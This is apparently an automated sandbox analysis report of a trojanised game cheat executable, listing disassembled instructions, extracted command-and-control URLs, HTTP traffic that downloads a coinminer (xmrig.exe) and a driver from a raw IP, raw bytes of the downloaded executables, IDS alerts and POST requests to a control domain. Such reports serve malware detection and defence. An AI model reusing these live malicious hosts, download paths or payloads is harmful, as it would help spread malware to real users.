                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4417E890h]2_2_0044E960
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h2_2_0044D130
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-31864DE8h]2_2_00430180
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-190DB6A4h]2_2_00430180
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+47419432h]2_2_00430180
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4F38BC58h]2_2_0042C9A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Ch]2_2_0044D240
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000E8h]2_2_004132C9
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00437B5C
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000002B0h]2_2_0041BBA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041BBA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041BBA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+4417E88Ch]2_2_0044DD50
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]2_2_004216A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4C3CF2B1h]2_2_004216A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi-4FC6521Ah]2_2_00444EA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+30h]2_2_0044B775
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4417E890h]2_2_0044E7E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00432F10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then push 00000000h2_2_004338F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov byte ptr [edi], al2_2_004388A5
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebx, bx2_2_0042F11D
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00437B5C
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004309A7
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then jmp ecx2_2_0044C24B
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-40234BF6h]2_2_0044BA55
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov dword ptr [esp], edx2_2_0041EA67
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov dword ptr [esp], edx2_2_0041EA67
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov edi, dword ptr [esp+04h]2_2_0041EA67
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+151E8BBCh]2_2_0041EA67
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov eax, ebx2_2_00424A00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx]2_2_00446A09
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+64h]2_2_0043723A
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+238384E0h]2_2_0043723A
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-20540288h]2_2_004492D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-20540288h]2_2_004492D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+50h]2_2_004292E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [ebp+00h], cx2_2_004292E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004342A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+64h]2_2_004372AB
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+238384E0h]2_2_004372AB
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00441AB0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then jmp eax2_2_0040FABA
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_0040A340
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_0040A340
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then jmp ecx2_2_0044C340
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+151E8BBCh]2_2_0041E30E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov dword ptr [esp+24h], ecx2_2_0044A31E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-000000BAh]2_2_0044A31E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4D3273BFh]2_2_0042DB32
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2D8681AAh]2_2_0042DB32
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]2_2_0042DB32
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then push ebp2_2_004113E5
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_00449B90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-190DB6A0h]2_2_004313A8
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_0041DC46
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+08h]2_2_0043247B
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebx, byte ptr [esi+eax-761C0E5Ch]2_2_0040E4E2
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h2_2_00431CF8
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00412C81
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+64h]2_2_00436CAF
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+238384E0h]2_2_00436CAF
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5B452AFEh]2_2_0040D4B0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-4C66CD08h]2_2_00420D00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+0Dh]2_2_00420D00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+01A3AABCh]2_2_00420D00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+3Ch]2_2_004335E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+04h]2_2_004335E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041C590
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041C590
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h2_2_00448DA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then jmp eax2_2_0040E5B1
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00430650
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+64h]2_2_00436E05
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+238384E0h]2_2_00436E05
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx ebp, word ptr [ecx]2_2_0044D6A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041AF40
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_0041F77A
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00432F10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov dword ptr [esp+08h], ebx2_2_004467E1
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 93A82FD1h2_2_00448F90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-20540284h]2_2_00448F90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_004027B0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00437FB8
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00437FBE
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_00D84668

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
                  Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
                  Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
                  Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
                  Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
                  Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
                  Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
                  Source: Malware configuration extractorURLs: bugildbett.top/bAuz
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 04:46:37 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 04:46:43 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 04:46:43 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49716 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49714 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49737 -> 185.215.113.51:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.96.3:443
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PR7RNlu8Me3QduBuodUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19631Host: citydisco.bet
